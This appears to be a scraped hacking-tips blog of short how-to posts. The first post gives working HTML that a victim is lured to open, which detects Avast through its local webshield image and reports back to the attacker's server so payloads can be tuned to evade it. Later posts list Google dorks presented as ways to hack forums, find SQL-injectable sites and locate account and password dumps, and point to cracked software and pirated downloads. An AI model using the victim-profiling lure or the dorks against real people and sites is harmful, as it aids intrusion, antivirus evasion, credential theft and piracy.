How to detect Avast Antivirus remotely?

During assessment if you know which Anti virus is used by client then you won half battle.Because you can download trial version of that AV & install it in virtual box & try to bypass that AV. So during real assessment your payload or binary don`t get caught.Today we gonna try to detect if client has installed avast or not?

Original video is posted here. In avast their is feature of site blocking ; so if you want to block any site you can put its address in block url section of avast interface.when someone load that site they get response as shown in below image.

In above image you can see that avast logo which address is localhost:12080/$$avast-webshield$$/image001.png . So if in client machine avast is installed than that image is also located at that address , by examine image is exist or not we can know that whether avast is installed or not.

For this purpose victim should visit  our link where we can check about image.So i am gonna use my apache server ; where i put three html page. One is our link which we gonna send to victim ; if image exist it redirect to other document ; & if image does not exist it redirect to third html page.

(1)Make blank html page & give it to name avst.html & put following code in that html page.

<meta http-equiv="refresh" content="0; url=http://google.com/">

(2)Now make second html page & give it to name ntavst.html & put same code in that page.

<meta http-equiv="refresh" content="0; url=http://google.com/">

(3)Make third & final html page and give it to name exp.html & put following code.

<div dir="ltr" style="text-align: left;" trbidi="on">

<img src="http://127.0.0.1:12080/$$avast-webshield$$"/image001.png" onload="document.location='http://180.215.198.150/avast.html'" onerror="document.location='http://180.215.198.150/ntavast.html'" />

Note:- Change your i.p in above code.

Now put these all document in /var/www/ folder.And send link of exp.html to victim

So if avast installed then it redirect to avast.html page & finally redirect to google.com & if it does not installed then it will redirect to ntavst.html page & then redirect to google.com

Now check your apache log file from \var\log\apache2\log ; you can check if avst.html page has been visited or ntavst.html page.

PS: You can use cobalt strike `s system profiler which get you os version;  browser detail; java version ; adobe reader  version & flash version.

Read More

How to get plain text source from shc compiled bash script?

Shc is used to protect your shell script from modification or inspection. If you created bash script want to distribute it , but dono`t want them to easily readble by other people , then you can use it.

First we see how to compiled bash script to binary?

wget http://www.datsi.fi.upm.es/~frosal/sources/shc-3.8.7.tgz

tar -xvzf shc-3.8.7.tgz

cd shc-3.8.7

make

./shc

You can see shc usage message.

shc Usage: shc [-e date] [-m addr] [-i iopt] [-x cmnd] [-l lopt] [-rvDTCAh] -f script

Now we have script which we want to convert in binary.

./shc -f /script_path

So now you can see that it will convert plain text bash source into binary which extension is  .sh.x.

How to retrieve plain text from binary?

The shc compiled binary decrypts and loads the script into memory when started right after we started the binary, just segfault it and retrieve our script from the core dump.

Core dumps are often used to  debug errors in Linux or UNIX programs. A core file is generated when an application program abnormally terminates due to bug, operating system security protection schema, or program simply try to write beyond the area of memory it has allocated.

By default most of linux distributions turn off core file creation.

So we need to turn on core file creation.

ulimit -c

If output is zero means that core file is not created.

Now we set core file size limit to 70000 byte

ulimit -c 70000

Now we start binary & segfault it right away.I used IP-Digger binary to get plain text from it.

./IP-Digger4.sh.x&  ( sleep 0.02 && kill -SIGSEGV $! )

 sleep 0.02 will give the binary enough time to start up and decrypt the original script. The variable $! contains the pid of the last background process started, so we can easily kill it with the segmentation fault signal SIGSEGV (same as kill -11 $!). 

+ segmentation fault (core dumped)  ./IP-Digger4.sh.x

cat core | strings >plain_text

Now open plain_text file which we created & find plain text source of bash script.I upload source code of ip-digger here .

But if your script is too large then adjust core file size.

Read More

How to view USB History of Windows PC?

USBDeview is a small utility that lists all USB devices that currently connected to your computer, as well as all USB devices that you previously used.
For each USB device, extended information is displayed: Device name/description, device type, serial number (for mass storage devices), the date/time that device was added, VendorID, ProductID, and more.
USBDeview also allows you to uninstall USB devices that you previously used, disconnect USB devices that are currently connected to your computer, as well as to disable and enable USB devices.

                 Download USBDeview For X32 System

                 Download USBDeview For X64 System  
You can also use USBDeview on a remote computer, as long as you login to that computer with admin user.

Connecting To Remote Computer

The following command-line options allows you to connect to remote computers. You must login to the remote computer with admin user in order to use these options.

• /remote <\\Computer Name>
  Allows you to connect a single remote computer.
  For Example:
  USBDeview.exe /remote \\MyComp
• /remotefile <Computers List File>
  Allows you to connect multiple computers, and view all their USB activity in one window. The computers list file should be a simple Ascii text file with computer names separated by colon, semicolon, space, tab characters or CRLF.
  For Example:
  USBDeview.exe /remotefile "c:\temp\comp.txt"
  
  

In order to successfully get full admin access to the remote computer, read this Blog post: How to connect a remote Windows 7/Vista/XP computer with NirSoft utilities.

Connecting To external SYSTEM registry file

If you have the 'SYSTEM' registry file of external operating system, you can use the following command-line option to read the USB devices list from it: 
/regfile <SYSTEM Registry File>

For Example:
USBDeview.exe /regfile "c:\temp\regfiles\SYSTEM"
USBDeview.exe /regfile "d:\windows\system32\config\SYSTEM"

This option has some limitations:

• You cannot read a Registry file of Windows XP/2003/Vista from Windows 2000 Machine.
• USBDeview works in read-only mode. (You cannot uninstall a device from external file)

Read More

How to find person through his email-address?

How to find person through its email-address?

If you get email from unknown person and before giving reply to email, you want to find little information about that person , then you need reverse email-address lookup. Or someone who abuse you , & you want to trace person you should use reverse email-address lookup.

If person has website or listed his account in any public website then you can find information about use of search engine. But in most cases , person use fake email-address for communication.

(1)If person use any desktop client(like outlook,Evolution mail etc) to send email then you can trace his I.P. From email. But if he send from browser then you get location of his email provider. For example , person send email from gmail through web-browser then you get location of gmail server.

Open the header of the email message and look for lines that say “Received: from” followed by an IP address in square brackets. If there are multiple entries, use the IP address mentioned in the last entry.

Now paste the IP address in this trace route tool and you should get a fairly good idea about the location of the email sender.

(2)Try to email search with Facebook. Facebook is largest social website nowadays , if person register his account on that email , then you can search his profile by email-address in facebook. Put his email-address in facebook search-box. 

(3)If the email address of the send is something like nirav_91@hotmail.com, there’s a probably that he or she may have created accounts of some other social network using the same alias “nirav_91” – put that in knowem.com to confirm. 

(4)Finally, if nothing works, you should try a people search service like Pipl and Spokeo –both services let you perform reverse email lookups but Spokeo has a more comprehensive database than Pipl.(But some Information in Spokeo need subscription) 

Other than regular web documents, Spoke also scans social networks and even the whois information of domain names to find any bit of information associated with an email address. 

Read More

How to download youtube video?

There are lots of method for download you tube videos.But here i am listing some commonly use methods

(1)It`s very easy , Download youtube downloader from here.& install it.open software & copy & paste video url into software.BUT here is problem, if your connection lost then it can not be resumed.

(2)Copy video url from youtube, now open http://keepvid.comor http://savevid.com and paste video url into their site. But for this purpose you should have java program installed.

(3)it`s my favourite method. No software or plugin needed. If you want to download following video

http://youtube.com/watch?v=Y4E9brXa6hAthen just put ss at begining of url like http://ssyoutube.com/watch?v=Y4E9brXa6hA and copy it & paste it in your browser addressbar.

(4)if you have internet download manager installed.it will automatically download when you start watching video. you can download full crack version of internet download manager form here.

Read More

How to hide secret file in image?

How to hide secret file in image?

Hello friends. Today we learn about other tricks of steganography. In past we learn about how to hide text in notepad. Now we learn about how to hide confidential file in image?

Requirement

Command prompt.

Before begin, I have one secret file named : secret.pdf, I do not want other people know about this file and also a picture named : apple.jpg. All of that files I put on my personal folder named pictures.

1. open command prompt.
2. Now change directory to picture folder through command prompt.
3. Now compress your secret file(secret.pdf) using winrar.
4. Next we use command prompt. type following code
   copy /b [image_filename].jpg + [rar_filename].rar nkd.jpg
   for our example code becomes
   copy /b apple.jpg + secret.rar nkd.jpg
   here nkd.jpg is our newfile which contain hidden document.
5. Go your picture folder , you can see nkd.jpg.
6. Now to view original file ,nothing too do just open file with winrar or you can also change extention from jpg to rar.

Read More

How to enable right click in web-site?

Why Right Click is Disable?

Right clicking your mouse can be very useful when surfing the web. It allows you to save images on webpages to your hard disk, to view source of a particular webpage, to download background music from a blog (when website code isn't complicated), and much more.

Now days, many websites and blogs doesn't allow you to right click on thier websites. I studied HTML and basic web designing, so I like to look at webpages' HTML codes when I find a new interesting website. And it makes me angry to find out that I can't right click. But as you know, there is always a way to get around something.

Just follow this Step.

Go to your browser`s options & disable java script. And reload your site. Now you can right click in website and blog.

Read More

How To Hide Text in Notepad?

Steganography is an art of writing hidden messages so that no one can suspect the existence of the message. The meaning of Steganographyis Concealed Writingand that is what we are going to do. We are going to learn that how to write hidden text in Microsoft Windows text editor Notepad. We should learn this technique so that we can easily hide our personal information in computer without any password protecting tools which are paid tools yes we have to pay to use those tools to protect our text data from unauthorized users. So below I have described with screen shots that how to hide text data in Notepad.

How to Hide Text in Notepad?

It is very easy, we just have to do few steps to hide our text in Notepad. So let’s start this tutorial.

1.First thing you need to do is open Command Promptfrom your Windows. I hope you know how to open it.
2.Then you have to go to your desired location by typing like this if you want to go to another drive then type in D:and press enter then if you want to change directory in this drive then type cd directory/directorychange directory/directorywith your directory names. Hope you get your desired location in Command Prompt.
3.Now type in cmd notepad filename.txt:hiddenand press enter, it will open a pop-up to ask you to create this file just press Yesthen you will see a Notepad file where you can type anything and save it.

It will make a file with name filename.txtin the drive you are using in Command Prompt. Now try to open that file from your drive, you will see that there will not be any text but we typed in when we created it first time. Now the question is how to see our hidden text, it is very easy and simple just do the same steps we did yes I am right first you have to open Command Prompt then type your drive then go to the location where the file is saved then type in notepad filename.txt:hiddento open the hidden text, if you want to save it then type something new and save this file from file menu and remember you can type any name instead of filename.txtI just used it for this tutorial. Click on the screen shot below to see clearly.

Read More

Redirect Site to Another Site

A simple text file edit makes sites redirect to another. When you type address in address bar in any browser and enter it then it will display another web page, for example:- when you type Google.com you will be redirected to yahoo.com

Instructions to do:

1) Go to this directory [c:\windows\system32\drivers\etc], directory may change according to drive used for os installation
2) then hit enter
3) find a file named "hosts"
4) Right click on it and open with word pad.
5) In the last link of the document type the IP* address of yahoo space www.Google.com (Vice versa for other sites)
6) now save it
7) restart the browser if its already running
8) Now try it, It works perfect

IP*: to find IP address of that website Goto start ->Run > type cmd > enter. Now you have a new window on desktop. On that type this without cotes "ping www. yahoo.com"
replace yahoo.com with your preferred site and then enter it

Read More

google hack trick

Ok today i will show google hack demostration you'v never seen
before.
You will never find these fucking google hack codes on internet.
just watch and learn what i have discovered!!!

Ok it's time to show the secrets.

and this is the best google hack codes.



I can make and combine any text and make google dorks from javascript,
from fucking html,css jquery,mootools and so on really fast and find
anything on this fucking lol g**gle !!!

I can bet what will see not understand what the fucking hell i'm doing.

Just sit down,drink some coffee and watch.

This is just a demonstration.

OK first i will show how to find any hacker forums,site it doesn't matter!
I mean profesional hackers!

Just read it all because if you are not doing you will not understand these
codes and how do they work!

Dorks:

inurl:"view.asp?page=" intext:"plymouth"

Ok what this code does ?
So this is the university schools you can hack with this dork university schools.

inurl:"shoutbox.php" intext:"script"

with this code you can hack shoutbox or to find scripts


inurl:"index.php?act=" rapidleech

This code will find rapidleecher sites very quickly.

inurl:"index.php?act=idx"

This code will find ipb forums quickly to hack

inurl:"Photoshop.aspx" "tutorials"

This code will find photoshop tutorials

inurl: http://ftp://ftp site:.com

This code will find any ftp servers and root any protected sites.

allinurl:user_index.jsp

This code will find any free hosting

powered by vbulletin games 3.8.4 inurl:member.php?u=1

This code will find any vbulletin game forums and admin page.

powered by vbulletin 4.0.3 Debug Information

This code will show all vbulletin forums php codes and information
and their bugs you root into it.

powered by vbulletin "warez"

This code will find any warez forum.

video to mp3 converter online intext:"mp3"-intext:"High Quality"

With this code you can download mp3 from youtube very quickly.

intext:"Warning: mysql_fetch_array()"

With this code you will find any vulnarable sites and hack them.

inurl:radioandtv.php

This code will show all torrents hidden radios stations.

inurl:"posting.php?mode=s milies" "phpbb"

With this code you will be able to hack phpbb forums and put xss inside forum.

allinurl:tools/spider-view.php

With this code you can to find sites links very quikcly.

embed src=".mp3" type=audio/mpeg

Html injection code to find secret sites with html mp3 embed code
you will see it even on google.

"powered by vbulletin" + "account dumps"

With this code you will be able find passwords
for any sites,forums not for porn.

allinurl:"guestbook/smileys.php"
inurl:"smileys.php" + "talking"
allinurl:smiliehelp.php

Talking smilies.

"intitle:index of" admin/FCKeditor/_samples/html

With this code you will be able to find fck server html
editors and hack them.

owl city fireflies + "instrumental"

With this code you will be able any mp3 instrumental and change this
owl city fireflies

HTTP/1.1 :: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3)
access_log

with this code you will be able to hack sites access
logs and see all information.

"sql google scanner" + "php"

Google sql injection online hack vulnerable sites,forums
and find vulnerables sites very easy.

site:youtube.com *@gmail.com

This will find any youtube or any site emails.

allinurl:html_colors.html

This will find very quickly html chart codes.

private torrent + "open sign up"

This will find any private torrent open to register.


hotfile + mediafire + "http://" + "rar" horror 2010 dvdrip,
(hotfile|mediafire).rar 2010 horror dvdrip

This will find any secret sites with dvdrip movies just change horror.

dvdrip 400mb "2010"

This will find ripped dvdrip movies in 400mb and lastest.

sql injection dork bank

This will find bank dorks for hacking google.

inurl:archive/index.php "visual basic"

This will find secret forums directory where you will see all information.

powered by vbulletin hacking zone
powered by vbulletin hackerz showoff

This will find hacker zone sites,forums.

--
This is video

http://www.youtube.com/watch?v=CYUrGRd7Q9M

Read More

HOW TO UNLOCK FOLDER WHICH IS LOCKED BY SOME SOFTWARE???

FOR THIS PURPOSE YOU ONLY NEED IS WINZIP OR ANY OTHER COMPRESSION SOFTWARE.

(1) Folder which are lock, sometimes it is hidden by that software. So first you check the option of show hide files  option in folder option of organise.
(2)Now you can see lock file..when u try to open it..it will not open. now right click on folder and add to   "folder name”.rar. I mean if ur folder name is lock,  then  right  click on lock and click to add “ lock”.rar
(3)now all thing is done. Open ur compressed folder, it will open. If it will not open. Then go on subfolder & do it again.

If this thing is not work, then i am sorry. Keep google it.

Read More

how to download from mediafire site?

All Mediafire.com Downloads:

http://www.google.com/search?hl=en&lr=&as_qdr=all&q=+.*+site%3Amediafire.com

Apps Downloads on Mediafire.com:

http://www.google.com/search?hl=en&lr=&as_qdr=all&q=.cab+OR+.exe+OR+.rar+OR+.zip+site%3Amediafire.com&btnG=Search
Movies Download on Mediafire.com

http://www.google.com/search?hl=en&lr=&as_qdr=all&q=+.Avi+OR+.mpg+OR+.mpeg+site%3Amediafire.com&btnG=Search

1)www. mediafiresearch.net Like any other MediaFire search website this site has options to search files on MediaFire, Rapidhsare.com, Hotfile.com, Filesonic.com and many other popular file uploading sites. Also it has got the last 100 searches made on the website in the form of links, you might like some of them.

2)www.shufs.com This is a very decent search engine for MediaFire with options to search files on Megaupload, Rapidshare, Bodango, and Zshare as well.

3)www.uvrx.com/mediafire.html UVRX uses Google custom search engine in order to find files from MediaFire. Type the keywords and it will fetch you the best possible results using the Google Search algorithm.

4)www.searchshared.com/mediafire.com This MediaFire Search engine site has been shared over 1783 Facebook fans and by the looks of it seems quite popular.

5)www. jqd.org  JQD supports Rapidshare, Megaupload, MediaFire, SendSpace, Gigasize, ADrive, Zshare, Depositfiles, Netload, Bodango, Megashares, FileFactory and you can also use it to search for Torrents online. If you want to try a cool file uploading site then check out 4Shared.com, we are sure you will love it. Anyways do let us know if you frequently use Mediafire.com search for all your downloading needs. Also share it with your buddies so that they can make use of all these Mediafire Search websites!

Read More